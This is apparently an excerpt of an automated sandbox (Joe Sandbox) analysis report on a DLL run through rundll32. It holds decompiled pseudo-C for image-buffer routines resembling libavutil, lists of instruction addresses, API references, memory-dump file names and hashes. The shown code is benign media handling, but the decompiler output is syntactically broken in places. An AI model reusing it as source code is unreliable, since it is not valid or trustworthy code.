						_t463 =  >=  ? _t430[0x10] : 0;
						_t555[0xf] = _t463;
						_t496 = _t463;
						if(_t467 != 1) {
							_t464 = _t555[0x12];
							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
							_t555[0xf] = _t496;
							if(_t467 != 2) {
								_t405 =  >=  ? _t496 : _t464[0x38];
								_t555[0xf] = _t405;
								_t496 = _t405;
								if(_t467 != 3) {
									_t406 = _t464[0x4c];
									_t571 = _t496 - _t406;
									_t407 =  >=  ? _t496 : _t406;
									_t555[0xf] =  >=  ? _t496 : _t406;
								}
							}
						}
					}
					_t555[1] = _t408;
					_t555[2] = _t555[0x25];
					 *_t555 =  &(_t555[0x14]);
					if(L1001EAB0(_t571) < 0) {
						_t555[5] = 0x209;
						_t555[1] = 0;
						 *_t555 = 0;
						_t555[4] = "libavutil/imgutils.c";
						_t555[3] = "ret >= 0";
						_t555[2] = "Assertion %s failed at %s:%d\n";
						L10023A40();
						abort();
						_push(_t543);
						_push(_t496);
						_t557 = _t555 - 0x15c;
						_t409 = _t557[0x5e];
						 *_t557 = _t409;
						_t314 = L10031C70(_t408);
						 *_t557 = _t409;
						_t545 = _t314;
						_t557[0xd] = L10031D50(_t519);
						_t316 = 0;
						__eflags = 0;
						do {
							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
							_t316 = _t316 + 8;
							__eflags = _t316 - 0x80;
						} while (_t316 < 0x80);
						_t557[0x14] = 0;
						_t557[0x15] = 0;
						_t557[0x16] = 0;
						_t557[0x17] = 0;
						_t557[0x18] = 0;
						_t557[0x19] = 0;
						_t557[0x1a] = 0;
						_t557[0x1b] = 0;
						__eflags = _t557[0xd] - 1 - 3;
						if(_t557[0xd] - 1 > 3) {
							L60:
							return 0xffffffea;
						} else {
							__eflags = _t545;
							if(_t545 == 0) {
								goto L60;
							} else {
								_t325 =  *(_t545 + 8);
								_t471 = _t325 & 0x00000008;
								_t498 = _t471;
								__eflags = _t498;
								if(_t498 != 0) {
									goto L60;
								} else {
									_t557[0xa] = _t325 & 0x00000020;
									__eflags = _t325 & 0x00000004;
									if(__eflags != 0) {
										 *_t557 = _t409;
										_t557[2] = 0;
										_t557[1] = _t557[0x60];
										_t547 = L1001E960(__eflags);
										_t330 = _t409 - 9;
										__eflags = _t330 - 1;
										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
										__eflags = _t409 - 9;
										_t411 =  !=  ? _t498 : 0xff;
										__eflags = _t557[0xd] - 1;
										if(__eflags != 0 || __eflags == 0) {
											goto L60;
										} else {
											__eflags = _t547;
											if(_t547 <= 0) {
												goto L60;
											} else {
												__eflags = _t557[0x5c];
												if(_t557[0x5c] != 0) {
													__eflags = _t557[0x61];
													_t526 =  *(_t557[0x5c]);
													if(_t557[0x61] > 0) {
														_t335 = (_t411 & 0x000000ff) * 0x1010101;
														__eflags = _t335;
														do {
															__eflags = _t547 - 8;
															_t474 = _t547;
															_t499 = _t526;
															if(_t547 >= 8) {
																__eflags = _t526 & 0x00000001;
																if((_t526 & 0x00000001) != 0) {
																	 *_t526 = _t335;
																	_t499 = _t526 + 1;
																	_t226 = _t547 - 1; // -1
																	_t474 = _t226;
																}
																__eflags = _t499 & 0x00000002;
																if((_t499 & 0x00000002) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 2;
																	_t499 = _t499 + 2;
																}
																__eflags = _t499 & 0x00000004;
																if((_t499 & 0x00000004) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 4;
																	_t499 = _t499 + 4;
																}
																_t434 = _t474;
																_t474 = _t474 & 0x00000003;
																_t435 = _t434 >> 2;
																_t335 = memset(_t499, _t335, _t435 << 2);
																_t557 =  &(_t557[3]);
																_t499 = _t499 + _t435;
															}
															_t475 = _t474 & 0x00000007;
															__eflags = _t475;
															if(_t475 != 0) {
																_t437 = 0;
																__eflags = 0;
																do {
																	 *(_t499 + _t437) = _t411;
																	_t437 = _t437 + 1;
																	__eflags = _t437 - _t475;
																} while (_t437 < _t475);
															}
															_t526 = _t526 +  *(_t557[0x5d]);
															_t216 =  &(_t557[0x61]);
															 *_t216 = _t557[0x61] - 1;
															__eflags =  *_t216;
														} while ( *_t216 != 0);
													}
												}
												goto L77;
											}
										}
									} else {
										_t477 =  *(_t545 + 4) & 0x000000ff;
										__eflags = _t477;
										if(__eflags == 0) {
											L57:
											_t557[0xa] = _t545;
											_t501 = _t557[0x60];
											_t548 = 0;
											_t528 = _t557[0xd];
											while(1) {
												_t557[2] = _t548;
												_t557[1] = _t501;
												 *_t557 = _t409;
												_t336 = L1001E960(__eflags);
												 *(_t557 + 0x60 + _t548 * 4) = _t336;
												__eflags = _t336;
												if(_t336 < 0) {
													goto L60;
												}
												_t548 = _t548 + 1;
												__eflags = _t528 - _t548;
												if(__eflags <= 0) {
													_t549 = _t557[0xa];
													__eflags = _t557[0x5c];
													if(_t557[0x5c] == 0) {
														L77:
														_t332 = 0;
														__eflags = 0;
													} else {
														_t557[0x13] = _t549;
														__eflags = 0;
														_t557[0xe] =  &(_t557[0x34]);
														_t557[0xa] = 0;
														do {
															_t338 = _t557[0xa];
															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
															_t550 =  *(_t557[0x5c] + _t338 * 4);
															__eflags = _t338 - 1 - 1;
															if(_t338 - 1 <= 1) {
																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
																_t342 = 1 << _t439;
															} else {
																_t342 = 1;
																_t439 = 0;
																__eflags = 0;
															}
															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
															_t557[0xc] = _t344;
															__eflags = _t344;
															if(_t344 > 0) {
																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
																_t347 = _t557[0xf];
																_t557[0xb] = _t413;
																__eflags = _t347 - _t413;
																_t533 =  >  ? _t413 : _t347;
																_t557[0x10] = _t533;
																_t348 = _t347 - _t533;
																__eflags = _t348;
																_t557[0x11] = _t348;
																do {
																	_t534 = _t557[0xb];
																	__eflags = _t534;
																	if(_t534 != 0) {
																		_t350 = _t557[0xe];
																		_t479 =  *_t350 & 0x000000ff;
																		_t440 =  &(_t350[_t534]);
																		while(1) {
																			__eflags =  *_t350 - _t479;
																			if( *_t350 != _t479) {
																				break;
																			}
																			_t350 =  &(_t350[1]);
																			__eflags = _t440 - _t350;
																			if(_t440 == _t350) {
																				L102:
																				_t351 = _t557[0xf];
																				_t502 = _t550;
																				__eflags = _t351 - 8;
																				_t414 = _t351;
																				if(_t351 >= 8) {
																					_t352 = _t479 * 0x1010101;
																					__eflags = _t550 & 0x00000001;
																					if((_t550 & 0x00000001) != 0) {
																						 *_t550 = _t352;
																						_t502 = _t550 + 1;
																						_t414 = _t557[0xf] - 1;
																					}
																					__eflags = _t502 & 0x00000002;
																					if((_t502 & 0x00000002) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 2;
																						_t502 = _t502 + 2;
																					}
																					__eflags = _t502 & 0x00000004;
																					if((_t502 & 0x00000004) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 4;
																						_t502 = _t502 + 4;
																					}
																					_t441 = _t414;
																					_t414 = _t414 & 0x00000003;
																					_t442 = _t441 >> 2;
																					memset(_t502, _t352, _t442 << 2);
																					_t557 =  &(_t557[3]);
																					_t502 = _t502 + _t442;
																				}
																				_t413 = _t414 & 0x00000007;
																				__eflags = _t413;
																				if(_t413 != 0) {
																					_t354 = 0;
																					__eflags = 0;
																					do {
																						 *(_t502 + _t354) = _t479;
																						_t354 = _t354 + 1;
																						__eflags = _t354 - _t413;
																					} while (_t354 < _t413);
																				}
																			} else {
																				continue;
																			}
																			goto L99;
																		}
																		__eflags = _t557[0xb] - 1;
																		if(_t557[0xb] == 1) {
																			goto L102;
																		} else {
																			_t355 = _t557[0x10];
																			_t503 = _t550;
																			_t537 = _t557[0xe];
																			__eflags = _t355 - 8;
																			_t444 = _t355;
																			if(_t355 >= 8) {
																				__eflags = _t550 & 0x00000001;
																				if((_t550 & 0x00000001) != 0) {
																					_t356 =  *_t537 & 0x000000ff;
																					_t503 = _t550 + 1;
																					_t537 = _t537 + 1;
																					_t557[0x12] = _t356;
																					 *_t550 = _t356;
																					_t444 = _t557[0x10] - 1;
																				}
																				__eflags = _t503 & 0x00000002;
																				if((_t503 & 0x00000002) != 0) {
																					_t358 =  *_t537 & 0x0000ffff;
																					_t503 = _t503 + 2;
																					_t537 = _t537 + 2;
																					_t444 = _t444 - 2;
																					 *(_t503 - 2) = _t358;
																				}
																				__eflags = _t503 & 0x00000004;
																				if((_t503 & 0x00000004) != 0) {
																					_t364 =  *_t537;
																					_t503 = _t503 + 4;
																					_t537 = _t537 + 4;
																					_t444 = _t444 - 4;
																					 *(_t503 - 4) = _t364;
																				}
																			}
																			memcpy(_t503, _t537, _t444);
																			_t557 =  &(_t557[3]);
																			_t557[2] = _t557[0x11];
																			_t361 = _t557[0x10];
																			_t557[1] = _t361;
																			_t362 = _t361 + _t550;
																			__eflags = _t362;
																			 *_t557 = _t362;
																			L10026D10(_t413, _t537 + _t444 + _t444, _t537);
																		}
																	}
																	L99:
																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
																	_t267 =  &(_t557[0xc]);
																	 *_t267 = _t557[0xc] - 1;
																	__eflags =  *_t267;
																} while ( *_t267 != 0);
															}
															_t557[0xa] = _t557[0xa] + 1;
															_t557[0xe] = _t557[0xe] + 0x20;
															__eflags = _t557[0xd] - _t557[0xa];
														} while (_t557[0xd] > _t557[0xa]);
														_t332 = 0;
													}
													return _t332;
												} else {
													continue;
												}
												goto L121;
											}
											goto L60;
										} else {
											_t365 =  *(_t545 + 0x14);
											__eflags = _t365;
											_t447 =  >=  ? _t365 : 0;
											__eflags = _t365 - 0x20;
											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
											if(_t365 > 0x20) {
												goto L60;
											} else {
												__eflags = _t477 - 1;
												if(__eflags == 0) {
													L45:
													_t557[0x5e] = _t409;
													_t557[0xa] = _t545;
													_t367 = _t557[0xa];
													_t557[0xc] = __eflags == 0;
													_t145 = _t545 + 0x10; // 0x10
													_t538 = _t145;
													__eflags = _t557[0x5f] - 2;
													_t557[0xe] = _t367;
													_t507 = 0;
													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
													__eflags = _t369;
													_t557[0xb] = _t369;
													while(1) {
														_t449 = _t538[4];
														asm("cdq");
														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
														_t557[0x20] = 0;
														_t557[0x21] = 0;
														__eflags = _t449 - 0x10;
														_t557[0x22] = 0;
														_t557[0x23] = 0;
														if(_t449 > 0x10) {
															goto L60;
														}
														__eflags = _t449 - 7;
														if(_t449 > 7) {
															L49:
															__eflags = _t372;
															if(_t372 <= 0) {
																goto L60;
															} else {
																__eflags = _t507;
																if(_t507 != 0) {
																	L61:
																	_t199 = _t507 - 1; // -1
																	_t417 = 0;
																	__eflags = _t199 - 1;
																	if(_t199 <= 1) {
																		__eflags = _t557[0xe];
																		if(_t557[0xe] == 0) {
																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
																		}
																	} else {
																		__eflags = _t507 - 3;
																		if(_t507 == 3) {
																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
																		}
																	}
																} else {
																	__eflags = _t557[0xb];
																	if(_t557[0xb] == 0) {
																		goto L61;
																	} else {
																		_t425 = 0x10 << _t449 - 8;
																		__eflags = _t425;
																		_t417 = _t425 & 0x0000ffff;
																	}
																}
																_t552 =  &(_t557[0x24]);
																_t450 = _t552 + _t372 * 2;
																_t484 = _t552;
																do {
																	 *_t484 = _t417;
																	_t484 =  &(_t484[0]);
																	__eflags = _t450 - _t484;
																} while (_t450 != _t484);
																_t418 = _t557[0xa];
																_t538 =  &(_t538[5]);
																_t557[7] = _t372;
																_t557[5] = 0;
																_t557[0x1c] =  &(_t557[0x34]);
																_t557[4] = 0;
																_t557[0x1d] =  &(_t557[0x3c]);
																_t557[2] =  &(_t557[0x20]);
																_t557[0x1e] =  &(_t557[0x44]);
																_t557[6] = _t507;
																_t507 = _t507 + 1;
																_t557[1] =  &(_t557[0x1c]);
																_t557[3] = _t418;
																 *_t557 = _t552;
																_t557[0x1f] =  &(_t557[0x4c]);
																E100316F0();
																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
																if(__eflags > 0) {
																	continue;
																} else {
																	_t545 = _t557[0xa];
																	_t409 = _t557[0x5e];
																	goto L57;
																}
															}
														} else {
															__eflags = _t557[0xc];
															if(_t557[0xc] != 0) {
																goto L60;
															} else {
																goto L49;
															}
														}
														goto L121;
													}
													goto L60;
												} else {
													_t453 =  *(_t545 + 0x24);
													_t508 =  *((intOrPtr*)(_t545 + 0x28));
													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
													__eflags = _t379 - _t508;
													_t380 =  <  ? _t508 : _t379;
													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
													__eflags = _t380 - 0x20;
													if(_t380 > 0x20) {
														goto L60;
													} else {
														__eflags = _t477 - 2;
														if(__eflags == 0) {
															goto L45;
														} else {
															_t454 =  *(_t545 + 0x38);
															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
															__eflags = _t381 - _t509;
															_t382 =  <  ? _t509 : _t381;
															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
															__eflags = _t382 - 0x20;
															if(_t382 > 0x20) {
																goto L60;
															} else {
																__eflags = _t477 - 3;
																if(__eflags == 0) {
																	goto L45;
																} else {
																	_t489 =  *(_t545 + 0x4c);
																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
																	__eflags = _t383 - _t455;
																	_t384 =  <  ? _t455 : _t383;
																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
																	__eflags = _t384 - 0x20;
																	if(__eflags > 0) {
																		goto L60;
																	} else {
																		goto L45;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t456 = 0;
						_t555[0x22] = _t519;
						_t539 = 0xffffffff;
						_t555[0x13] = _t543;
						_t555[0xe] = _t555[0x23];
						_t386 = 1;
						_t555[0x11] =  ~(_t555[0x27]);
						while(1) {
							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
							_t429 = _t555[0x22][4 + _t539 * 4];
							_t555[0xc] = _t388;
							if(_t388 <= 0) {
								goto L18;
							}
							_t553 =  *(_t555 + 0x54 + _t539 * 4);
							_t555[0x10] = _t539;
							_t555[0xb] = 0;
							_t398 = _t555[0x20];
							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
							do {
								_t458 = _t553;
								_t514 = _t398;
								_t541 = _t429;
								if(_t553 >= 8) {
									if((_t398 & 0x00000001) != 0) {
										_t514 = _t398 + 1;
										_t541 = _t429 + 1;
										 *_t398 =  *_t429 & 0x000000ff;
										_t458 = _t553 - 1;
									}
									if((_t514 & 0x00000002) != 0) {
										_t494 =  *_t541 & 0x0000ffff;
										_t514 = _t514 + 2;
										_t541 = _t541 + 2;
										_t458 = _t458 - 2;
										 *(_t514 - 2) = _t494;
									}
									if((_t514 & 0x00000004) != 0) {
										_t495 =  *_t541;
										_t514 = _t514 + 4;
										_t541 = _t541 + 4;
										_t458 = _t458 - 4;
										 *(_t514 - 4) = _t495;
									}
								}
								_t399 = memcpy(_t514, _t541, _t458);
								_t555 =  &(_t555[3]);
								_t555[0xb] =  &(_t555[0xb][1]);
								_t517 = _t555[0xd];
								_t398 = _t399 + _t517;
								_t429 = _t429 +  *(_t555[0xe]);
							} while (_t555[0xc] != _t555[0xb]);
							_t539 = _t555[0x10];
							_t68 =  &(_t555[0x20]);
							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
							__eflags =  *_t68;
							L18:
							_t539 = _t539 + 1;
							__eflags = _t555[0xf] - _t539;
							if(_t555[0xf] != _t539) {
								__eflags = _t539 - 1;
								if(_t539 <= 1) {
									_t456 = _t555[0x12][6] & 0x000000ff;
									_t386 = 1 << _t456;
								} else {
									_t386 = 1;
									_t456 = 0;
									__eflags = 0;
								}
								_t555[0xe] =  &(_t555[0xe][4]);
								continue;
							}
							_t389 = _t555[0x12];
							_t544 = _t555[0x13];
							_t540 = _t555[0x22];
							__eflags = _t389[8] & 0x00000002;
							if((_t389[8] & 0x00000002) != 0) {
								_t457 = _t555[0x20];
								_t393 = 0;
								__eflags = 0;
								do {
									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
									_t393 = _t393 + 4;
									__eflags = _t393 - 0x400;
								} while (_t393 != 0x400);
							}
							L28:
							return _t544;
							goto L121;
						}
					}
				}
				L121:
			}

0x1002082c
0x10020834
0x1002083e
0x10020845
0x1002084c
0x10020857
0x1002085a
0x10020865
0x10020869
0x1002086e
0x10020871
0x10020873
0x10020882
0x10020886
0x1002088f
0x10020ab8
0x00000000
0x1002089d
0x1002089d
0x100208a3
0x10020aad
0x10020aaf
0x100208a9
0x100208b0
0x100208b6
0x100208ba
0x100208bc
0x100208be
0x100208c9
0x100208d1
0x100208d5
0x100208dc
0x100208e2
0x100208e6
0x100208e8
0x100208ea
0x100208ed
0x100208ef
0x100208f2
0x100208f2
0x100208e8
0x100208d5
0x100208bc
0x100208f6
0x10020901
0x10020909
0x10020913
0x10020abf
0x10020ac9
0x10020acd
0x10020ad0
0x10020ad8
0x10020ae0
0x10020ae8
0x10020aed
0x10020b00
0x10020b01
0x10020b04
0x10020b0a
0x10020b11
0x10020b14
0x10020b19
0x10020b1c
0x10020b25
0x10020b29
0x10020b29
0x10020b2b
0x10020b2b
0x10020b32
0x10020b39
0x10020b3c
0x10020b3c
0x10020b47
0x10020b4f
0x10020b57
0x10020b5d
0x10020b63
0x10020b6b
0x10020b6f
0x10020b73
0x10020b78
0x10020b7b
0x10020db1
0x10020dc0
0x10020b81
0x10020b81
0x10020b83
0x00000000
0x10020b89
0x10020b89
0x10020b90
0x10020b93
0x10020b93
0x10020b95
0x00000000
0x10020b9b
0x10020ba3
0x10020ba9
0x10020bac
0x10020e10
0x10020e1c
0x10020e20
0x10020e29
0x10020e2b
0x10020e2e
0x10020e31
0x10020e34
0x10020e3c
0x10020e3f
0x10020e44
0x00000000
0x10020e59
0x10020e59
0x10020e5b
0x00000000
0x10020e61
0x10020e68
0x10020e6a
0x10020e7a
0x10020e7c
0x10020e7e
0x10020e83
0x10020e83
0x10020e90
0x10020e90
0x10020e93
0x10020e95
0x10020e97
0x10020ed0
0x10020ed6
0x10020ef4
0x10020ef6
0x10020ef9
0x10020ef9
0x10020ef9
0x10020ed8
0x10020ede
0x10020f08
0x10020f0b
0x10020f0e
0x10020f0e
0x10020ee0
0x10020ee6
0x10020efe
0x10020f00
0x10020f03
0x10020f03
0x10020ee8
0x10020eea
0x10020eed
0x10020ef0
0x10020ef0
0x10020ef0
0x10020ef0
0x10020e99
0x10020e99
0x10020e9c
0x10020e9e
0x10020e9e
0x10020ea0
0x10020ea0
0x10020ea3
0x10020ea4
0x10020ea4
0x10020ea0
0x10020eb1
0x10020eb3
0x10020eb3
0x10020eb3
0x10020eb3
0x10020e90
0x10020e7e
0x00000000
0x10020e6a
0x10020e5b
0x10020bb2
0x10020bb2
0x10020bb6
0x10020bb8
0x10020d78
0x10020d78
0x10020d7e
0x10020d85
0x10020d87
0x10020d99
0x10020d99
0x10020d9d
0x10020da1
0x10020da4
0x10020da9
0x10020dad
0x10020daf
0x00000000
0x00000000
0x10020d90
0x10020d91
0x10020d93
0x10020f1a
0x10020f1e
0x10020f20
0x10020ebc
0x10020ebc
0x10020ebc
0x10020f22
0x10020f22
0x10020f2d
0x10020f2f
0x10020f33
0x10020f37
0x10020f37
0x10020f3f
0x10020f4a
0x10020f4e
0x10020f51
0x100210ab
0x100210b4
0x10020f57
0x10020f57
0x10020f5c
0x10020f5c
0x10020f5c
0x10020f69
0x10020f6b
0x10020f6f
0x10020f71
0x10020f7b
0x10020f7f
0x10020f83
0x10020f87
0x10020f8b
0x10020f8e
0x10020f92
0x10020f92
0x10020f94
0x10020fa0
0x10020fa0
0x10020fa4
0x10020fa6
0x10020fa8
0x10020fac
0x10020faf
0x10020fbd
0x10020fbd
0x10020fbf
0x00000000
0x00000000
0x10020fb8
0x10020fb9
0x10020fbb
0x10021030
0x10021030
0x10021034
0x10021036
0x10021039
0x1002103b
0x1002104e
0x10021054
0x1002105a
0x100210d0
0x100210d3
0x100210da
0x100210da
0x1002105c
0x10021062
0x100210c5
0x100210c8
0x100210cb
0x100210cb
0x10021064
0x1002106a
0x100210bb
0x100210bd
0x100210c0
0x100210c0
0x1002106c
0x1002106e
0x10021071
0x10021074
0x10021074
0x10021074
0x10021074
0x1002103d
0x1002103d
0x10021040
0x10021042
0x10021042
0x10021044
0x10021044
0x10021047
0x10021048
0x10021048
0x1002104c
0x00000000
0x00000000
0x00000000
0x00000000
0x10020fbb
0x10020fc1
0x10020fc6
0x00000000
0x10020fc8
0x10020fc8
0x10020fcc
0x10020fce
0x10020fd2
0x10020fd5
0x10020fd7
0x10021078
0x1002107e
0x100210f4
0x100210f7
0x100210fa
0x100210fb
0x100210ff
0x10021106
0x10021106
0x10021080
0x10021086
0x100210e2
0x100210e5
0x100210e8
0x100210eb
0x100210ee
0x100210ee
0x10021088
0x1002108e
0x10021094
0x10021096
0x10021099
0x1002109c
0x1002109f
0x1002109f
0x1002108e
0x10020fdd
0x10020fdd
0x10020fe3
0x10020fe7
0x10020feb
0x10020fef
0x10020fef
0x10020ff1
0x10020ff4
0x10020ff4
0x10020fc6
0x10020ff9
0x10021007
0x10021009
0x10021009
0x10021009
0x10021009
0x10020fa0
0x1002100f
0x10021013
0x1002101c
0x1002101c
0x10021026
0x10021026
0x10020ec8
0x00000000
0x00000000
0x00000000
0x00000000
0x10020d93
0x00000000
0x10020bbe
0x10020bbe
0x10020bc6
0x10020bc8
0x10020bcb
0x10020bce
0x10020bd2
0x00000000
0x10020bd8
0x10020bd8
0x10020bdb
0x10020c3b
0x10020c3b
0x10020c46
0x10020c4a
0x10020c4c
0x10020c56
0x10020c56
0x10020c59
0x10020c61
0x10020c68
0x10020c6a
0x10020c6a
0x10020c6c
0x10020c70
0x10020c76
0x10020c7d
0x10020c7e
0x10020c83
0x10020c8c
0x10020c93
0x10020c96
0x10020c9d
0x10020ca4
0x00000000
0x00000000
0x10020caa
0x10020cad
0x10020cba
0x10020cba
0x10020cbc
0x00000000
0x10020cc2
0x10020cc2
0x10020cc4
0x10020dc8
0x10020dc8
0x10020dcb
0x10020dcd
0x10020dd0
0x10020df4
0x10020df6
0x10020e06
0x10020e06
0x10020dd2
0x10020dd2
0x10020dd5
0x10020de3
0x10020de3
0x10020dd5
0x10020cca
0x10020cca
0x10020cd0
0x00000000
0x10020cd6
0x10020cde
0x10020cde
0x10020ce0
0x10020ce0
0x10020cd0
0x10020ce3
0x10020cea
0x10020cee
0x10020cf0
0x10020cf0
0x10020cf3
0x10020cf6
0x10020cf6
0x10020cfa
0x10020d05
0x10020d08
0x10020d0e
0x10020d14
0x10020d1f
0x10020d2a
0x10020d35
0x10020d3d
0x10020d48
0x10020d4c
0x10020d4d
0x10020d51
0x10020d55
0x10020d58
0x10020d5c
0x10020d65
0x10020d67
0x00000000
0x10020d6d
0x10020d6d
0x10020d71
0x00000000
0x10020d71
0x10020d67
0x10020caf
0x10020caf
0x10020cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x10020cb4
0x00000000
0x10020cad
0x00000000
0x10020bdd
0x10020bdd
0x10020be0
0x10020be3
0x10020be7
0x10020be9
0x10020bec
0x10020bf0
0x10020bf3
0x00000000
0x10020bf9
0x10020bf9
0x10020bfc
0x00000000
0x10020bfe
0x10020bfe
0x10020c01
0x10020c04
0x10020c08
0x10020c0a
0x10020c0d
0x10020c11
0x10020c14
0x00000000
0x10020c1a
0x10020c1a
0x10020c1d
0x00000000
0x10020c1f
0x10020c1f
0x10020c22
0x10020c25
0x10020c29
0x10020c2b
0x10020c2e
0x10020c32
0x10020c35
0x00000000
0x00000000
0x00000000
0x00000000
0x10020c35
0x10020c1d
0x10020c14
0x10020bfc
0x10020bf3
0x10020bdb
0x10020bd2
0x10020bb8
0x10020bac
0x10020b95
0x10020b83
0x10020919
0x10020925
0x10020927
0x10020935
0x10020937
0x1002093d
0x10020941
0x10020946
0x1002094a
0x1002095c
0x1002095e
0x10020962
0x10020968
0x00000000
0x00000000
0x1002096e
0x10020974
0x1002097f
0x1002098d
0x10020994
0x100209be
0x100209c1
0x100209c3
0x100209c5
0x100209c7
0x100209cb
0x10020a3b
0x10020a3e
0x10020a41
0x10020a43
0x10020a43
0x100209d3
0x10020a20
0x10020a23
0x10020a26
0x10020a29
0x10020a2c
0x10020a2c
0x100209db
0x100209dd
0x100209df
0x100209e2
0x100209e5
0x100209e8
0x100209e8
0x100209db
0x100209a0
0x100209a0
0x100209a6
0x100209aa
0x100209b4
0x100209b6
0x100209b8
0x100209f4
0x100209fb
0x100209fb
0x100209fb
0x10020a02
0x10020a02
0x10020a03
0x10020a07
0x10020a09
0x10020a0c
0x10020a54
0x10020a5d
0x10020a0e
0x10020a0e
0x10020a13
0x10020a13
0x10020a13
0x10020a15
0x00000000
0x10020a15
0x10020a68
0x10020a6c
0x10020a70
0x10020a7d
0x10020a80
0x10020a82
0x10020a89
0x10020a89
0x10020a90
0x10020a96
0x10020a99
0x10020a9c
0x10020a9c
0x10020a90
0x10020aa3
0x10020aac
0x00000000
0x10020aac
0x1002094a
0x10020913
0x00000000

APIs

mv_image_get_buffer_size.MAIN ref: 10020869

Part of subcall function 10020660: mv_pix_fmt_desc_get.MAIN ref: 1002067F
Part of subcall function 10020660: mv_image_get_linesize.MAIN ref: 100206B4
Part of subcall function 10020660: mv_image_fill_linesizes.MAIN(?), ref: 10020748
Part of subcall function 10020660: mv_image_fill_plane_sizes.MAIN(?), ref: 100207AB

mv_pix_fmt_desc_get.MAIN ref: 10020873
mv_image_fill_linesizes.MAIN ref: 1002090C
mv_log.MAIN ref: 10020AE8
abort.MSVCRT ref: 10020AED
mv_pix_fmt_desc_get.MAIN ref: 10020B14
mv_pix_fmt_count_planes.MAIN ref: 10020B1E

Strings

, xrefs: 10021013
Assertion %s failed at %s:%d, xrefs: 10020AE0

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
String ID: $Assertion %s failed at %s:%d
API String ID: 1281078460-3513380740
Opcode ID: 99e06289daf78a6ca96af0f60519a31471a37a4d134c2c0f1ab6416b77e2cdf9
Instruction ID: fe239d7c88f41c1dfdb003e78fe5e5a72561725cb47db01215c2ba04b777841e
Opcode Fuzzy Hash: 99e06289daf78a6ca96af0f60519a31471a37a4d134c2c0f1ab6416b77e2cdf9
Instruction Fuzzy Hash: 9D426E75A083858FC760CF28D48069EBBE2FFC8354F96892DF99997312D771E9418B42

Uniqueness

Uniqueness Score: -1.00%

Function 10013100 Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

mv_mallocz.MAIN ref: 10013116
mv_mallocz.MAIN ref: 10013128
mv_mallocz.MAIN ref: 10013154
mv_mallocz.MAIN ref: 100131C3
mv_calloc.MAIN ref: 100132A0

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

